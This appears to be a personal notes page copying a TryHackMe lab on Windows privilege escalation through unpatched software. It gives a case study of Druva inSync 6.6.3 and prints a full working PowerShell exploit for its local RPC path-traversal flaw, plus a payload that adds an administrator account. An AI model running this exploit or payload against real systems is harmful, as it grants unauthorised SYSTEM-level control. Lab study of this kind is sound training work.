<!DOCTYPE html>
<html lang="en">
<head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="generator" content="mkdocs-1.4.3, mkdocs-terminal-4.4.0">
     
     
    <link rel="icon" type="image/png" sizes="192x192" href="../img/android-chrome-192x192.png" />
<link rel="icon" type="image/png" sizes="512x512" href="../img/android-chrome-512x512.png" />
<link rel="apple-touch-icon" sizes="180x180" href="../img/apple-touch-icon.png" />
<link rel="shortcut icon" type="image/png" sizes="48x48" href="../img/favicon.ico" />
<link rel="icon" type="image/png" sizes="16x16" href="../img/favicon-16x16.png" />
<link rel="icon" type="image/png" sizes="32x32" href="../img/favicon-32x32.png" />


    
 
<title>VulnerableSoftwares - My Docs</title>


<link href="../css/fontawesome/css/fontawesome.min.css" rel="stylesheet">
<link href="../css/fontawesome/css/solid.min.css" rel="stylesheet">
<link href="../css/normalize.css" rel="stylesheet">
<link href="../css/terminal.css" rel="stylesheet">
<link href="../css/theme.css" rel="stylesheet">
<link href="../css/theme.tile_grid.css" rel="stylesheet">
<link href="../css/theme.footer.css" rel="stylesheet">
<!-- gruvbox_dark color palette -->
<link href="../css/palettes/gruvbox_dark.css" rel="stylesheet">

<!-- page layout -->
<style>
/* initially set page layout to a one column grid */
.terminal-mkdocs-main-grid {
    display: grid;
    grid-column-gap: 1.4em;
    grid-template-columns: auto;
    grid-template-rows: auto;
}

/*  
*   when side navigation is not hidden, use a two column grid.  
*   if the screen is too narrow, fall back to the initial one column grid layout.
*   in this case the main content will be placed under the navigation panel. 
*/
@media only screen and (min-width: 70em) {
    .terminal-mkdocs-main-grid {
        grid-template-columns: 4fr 9fr;
    }
}</style>



     
    
    

    
    <!-- search css support -->
<link href="../css/search/bootstrap-modal.css" rel="stylesheet">
<!-- search scripts -->
<script>
    var base_url = "..",
    shortcuts = "{}";
</script>
<script src="../js/jquery/jquery-1.10.1.min.js" defer></script>
<script src="../js/bootstrap/bootstrap.min.js" defer></script>
<script src="../js/mkdocs/base.js" defer></script>
    
    
    
    
    <script src="../search/main.js"></script>
    

    
</head>

<body class="terminal"><div class="container">
    <div class="terminal-nav">
        <header class="terminal-logo">
            <div id="mkdocs-terminal-site-name" class="logo terminal-prompt"><a href="/" class="no-style">My Docs</a></div>
        </header>
        
        <nav class="terminal-menu">
            
            <ul vocab="https://schema.org/" typeof="BreadcrumbList">
                
                
                <li property="itemListElement" typeof="ListItem">
                    <a href=".." class="menu-item " property="item" typeof="WebPage">
                        <span property="name">About Me</span>
                    </a>
                    <meta property="position" content="0">
                </li>
                
                
                
                
                <li property="itemListElement" typeof="ListItem">
                    <a href="../abusing_priviliges/" class="menu-item " property="item" typeof="WebPage">
                        <span property="name">Writeups</span>
                    </a>
                    <meta property="position" content="1">
                </li>
                
                
                
                
                
                
                <li property="itemListElement" typeof="ListItem">
                    <a href="../ServiceMisconfigurations/" class="menu-item " property="item" typeof="WebPage">
                        <span property="name">ServiceMisconfiguration</span>
                    </a>
                    <meta property="position" content="2">
                </li>
                
                
                <li property="itemListElement" typeof="ListItem">
                    <a href="./" class="menu-item active" property="item" typeof="WebPage">
                        <span property="name">VulnerableSoftwares</span>
                    </a>
                    <meta property="position" content="3">
                </li>
                
                    
                    


<li property="itemListElement" typeof="ListItem">
    <a href="#" class="menu-item" data-toggle="modal" data-target="#mkdocs_search_modal" property="item" typeof="SearchAction">
        <i aria-hidden="true" class="fa fa-search"></i> <span property="name">Search</span>
    </a>
    <meta property="position" content="4">
</li>
                    
            </ul>
            
        </nav>
    </div>
</div>
        
    <div class="container">
        <div class="terminal-mkdocs-main-grid"><aside id="terminal-mkdocs-side-panel"><nav>
  
    <ul class="terminal-mkdocs-side-nav-items">
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
    
        
        
            <a class="

    terminal-mkdocs-side-nav-item" href="..">About Me</a>
        
    
    
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
        
        
            
            
                
                
        

             
            
    
        
        <a class="

    terminal-mkdocs-side-nav-item" href="../About_Me/">About</a>
    
    
        
      
        
            <ul class="terminal-mkdocs-side-nav-li-ul">
            
    </ul>
        
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
    
        
        
            <a class="

    terminal-mkdocs-side-nav-item" href="../abusing_priviliges/">Writeups</a>
        
    
    
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
        
        
            
                
        

        
            
    
        
        
            
            
            <span class="
        
            
        
    

    terminal-mkdocs-side-nav-item terminal-mkdocs-side-nav-section-no-index">Linux</span>
        
    
    
        
      
        
            <ul class="terminal-mkdocs-side-nav-li-ul">
        
            
            
                
                
            

             
                <li class="terminal-mkdocs-side-nav-li-ul-li">
    
        
        
            <a class="

    terminal-mkdocs-side-nav-item" href="../abusing_priviliges/">tryhackme</a>
        
    
    </li>
            
        
            
            
                
                
            

             
                <li class="terminal-mkdocs-side-nav-li-ul-li">
    
        
        
            <a class="

    terminal-mkdocs-side-nav-item" href="../abusing_priviliges/">hackthebox</a>
        
    
    </li>
            
            
    </ul>
        
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
        
        
            
            
                
                
        

             
            
    
        
        <a class="

    terminal-mkdocs-side-nav-item" href="./">PrivilegeEscalation</a>
    
    
        
      
        
            <ul class="terminal-mkdocs-side-nav-li-ul">
        
            
            
                
                
                    
                
            

            
                <li class="terminal-mkdocs-side-nav-li-ul-li">
    
        
        <a class="

    terminal-mkdocs-side-nav-item" href="../ServiceMisconfigurations/">Windows</a>
    
    </li>
            
            
    </ul>
        
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
    
        
        
            <a class="

    terminal-mkdocs-side-nav-item" href="../ServiceMisconfigurations/">ServiceMisconfiguration</a>
        
    
    
    
  </li>
        
          



<li class="terminal-mkdocs-side-nav-li">
    
    
    
        
        <span class="

    terminal-mkdocs-side-nav-item--active">VulnerableSoftwares</span>
    
    
    
  </li>
        
    </ul>
  
</nav><hr>
<nav>
    <ul>
        <li><a href="#unpatched-software">Unpatched Software</a></li>
        <li><a href="#case-study-druva-insync-663">Case Study: Druva inSync 6.6.3</a></li>
        
    </ul>
</nav>
</aside>
            <main id="terminal-mkdocs-main-content">
<section id="mkdocs-terminal-content">
    <p>Make sure to click the <strong>Start Machine</strong> button before you continue, which will deploy the target machine in split-view. If you prefer connecting to the machine via RDP, you can use the following credentials:</p>
<p><img alt="THM flag" src="https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/07e460b453a5ec5245077b881195ee4e.png" /></p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Username</strong></td>
<td>thm-unpriv</td>
</tr>
<tr>
<td><strong>Password</strong></td>
<td>Password321</td>
</tr>
</tbody>
</table>
<h2 id="unpatched-software">Unpatched Software<a class="headerlink" href="#unpatched-software" title="Anchor link to this section for reference">#</a></h2>
<p>Software installed on the target system can present various privilege escalation opportunities. As with drivers, organisations and users may not update them as often as they update the operating system. You can use the <code>wmic</code> tool to list software installed on the target system and its versions. The command below will dump information it can gather on installed software (it might take around a minute to finish):</p>
<pre><code class="language-shell-session">wmic product get name,version,vendor
</code></pre>
<p>Remember that the <code>wmic product</code> command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.</p>
<p>Once we have gathered product version information, we can always search for existing exploits on the installed software online on sites like <a href="https://www.exploit-db.com/">exploit-db</a>, <a href="https://packetstormsecurity.com/">packet storm</a> or plain old <a href="https://www.google.com/">Google</a>, amongst many others.</p>
<p>Using wmic and Google, can you find a known vulnerability on any installed product?</p>
<h2 id="case-study-druva-insync-663">Case Study: Druva inSync 6.6.3<a class="headerlink" href="#case-study-druva-insync-663" title="Anchor link to this section for reference">#</a></h2>
<p>The target server is running Druva inSync 6.6.3, which is vulnerable to privilege escalation as reported by <a href="https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/">Matteo Malvica</a>. The vulnerability results from a bad patch applied over another vulnerability reported initially for version 6.5.0 by <a href="https://www.tenable.com/security/research/tra-2020-12">Chris Lyne</a>.</p>
<p>The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only. If you aren't familiar with RPC, it is simply a mechanism that allows a given process to expose functions (called procedures in RPC lingo) over the network so that other machines can call them remotely.</p>
<p>In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges.</p>
<p>The original vulnerability reported on versions 6.5.0 and prior allowed any command to be run without restrictions. The original idea behind providing such functionality was to remotely execute some specific binaries provided with inSync, rather than any command. Still, no check was made to make sure of that.</p>
<p>A patch was issued, where they decided to check that the executed command started with the string <code>C:\ProgramData\Druva\inSync4\</code>, where the allowed binaries were supposed to be. But then, this proved insufficient since you could simply make a path traversal attack to bypass this kind of control. Suppose that you want to execute <code>C:\Windows\System32\cmd.exe</code>, which is not in the allowed path; you could simply ask the server to run <code>C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe</code> and that would bypass the check successfully.</p>
<p>To put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram:</p>
<p><img alt="Druva Exploit Diagram" src="https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/ff706d6530426d3123c0983acd61f934.png" /></p>
<p>The first packet is simply a hello packet that contains a fixed string. The second packet indicates that we want to execute procedure number 5, as this is the vulnerable procedure that will execute any command for us. The last two packets are used to send the length of the command and the command string to be executed, respectively.</p>
<p>Initially published by Matteo Malvica <a href="https://packetstormsecurity.com/files/160404/Druva-inSync-Windows-Client-6.6.3-Privilege-Escalation.html">here</a>, the following exploit can be used in your target machine to elevate privileges and retrieve this task's flag. For your convenience, here is the original exploit's code:</p>
<pre><code class="language-powershell">$ErrorActionPreference = &quot;Stop&quot;

$cmd = &quot;net user pwnd /add&quot;

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect(&quot;127.0.0.1&quot;, 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes(&quot;inSync PHC RPCW[v0002]&quot;)
$rpcType = [System.Text.Encoding]::UTF8.GetBytes(&quot;$([char]0x0005)`0`0`0&quot;)
$command = [System.Text.Encoding]::Unicode.GetBytes(&quot;C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd&quot;);
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
</code></pre>
<p>You can pop a Powershell console and paste the exploit directly to execute it (The exploit is also available in the target machine at <code>C:\tools\Druva_inSync_exploit.txt</code>). Note that the exploit's default payload, specified in the <code>$cmd</code> variable, will create a user named <code>pwnd</code> in the system, but won't assign him administrative privileges, so we will probably want to change the payload for something more useful. For this room, we will change the payload to run the following command:</p>
<pre><code class="language-powershell">net user pwnd SimplePass123 /add &amp; net localgroup administrators pwnd /add
</code></pre>
<p>This will create user <code>pwnd</code> with a password of <code>SimplePass123</code> and add it to the administrators' group. If the exploit was successful, you should be able to run the following command to verify that the user <code>pwnd</code> exists and is part of the administrators' group:</p>
<p>Command Prompt</p>
<pre><code class="language-shell-session">PS C:\&gt; net user pwnd
User name                    pwnd
Full Name
Account active               Yes
[...]

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
</code></pre>
<p>As a last step, you can run a command prompt as administrator:</p>
<p><img alt="Run Command Prompt as Pwnd" src="https://tryhackme-images.s3.amazonaws.com/user-uploads/5ed5961c6276df568891c3ea/room-content/bbd0af143c9a9b31c1acce32fabfdc0f.png" />  </p>
<pre><code>When prompted for credentials, use the `pwnd` account. From the new command prompt, you can retrieve your flag from the Administrator's desktop with the following command `type C:\Users\Administrator\Desktop\flag.txt`.
</code></pre>
</section>

            </main>
        </div>
        <hr><footer>
    <div class="terminal-mkdocs-footer-grid">
        <div id="terminal-mkdocs-footer-copyright-info">
             Site built with <a href="http://www.mkdocs.org">MkDocs</a> and <a href="https://github.com/ntno/mkdocs-terminal">Terminal for MkDocs</a>.
        </div>
        <div id="terminal-mkdocs-footer-prev-next">
            <nav class="btn-group">
                <a href="../ServiceMisconfigurations/" title="ServiceMisconfiguration">Previous</a>
                
            </nav>
        </div>
    </div>
</footer>
    </div>

    
    <div class="modal" id="mkdocs_search_modal" tabindex="-1" role="alertdialog" aria-modal="true" aria-labelledby="searchModalLabel">
    <div class="modal-dialog modal-lg" role="search">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="searchModalLabel">Search</h5>
                <button type="button" class="close btn btn-default btn-ghost" data-dismiss="modal"><span aria-hidden="true">x</span><span class="sr-only">Close</span></button>
            </div>
            <div class="modal-body">
                <p id="searchInputLabel">Type to start searching</p>
                <form>
                    <div class="form-group">
                        <input type="search" class="form-control" aria-labelledby="searchInputLabel" placeholder="" id="mkdocs-search-query" title="Please enter search terms here">
                    </div>
                </form>
                <div id="mkdocs-search-results" data-no-results-text="No document matches found"></div>
            </div>
            <div class="modal-footer">
            </div>
        </div>
    </div>
</div>
    
    
</body>

</html>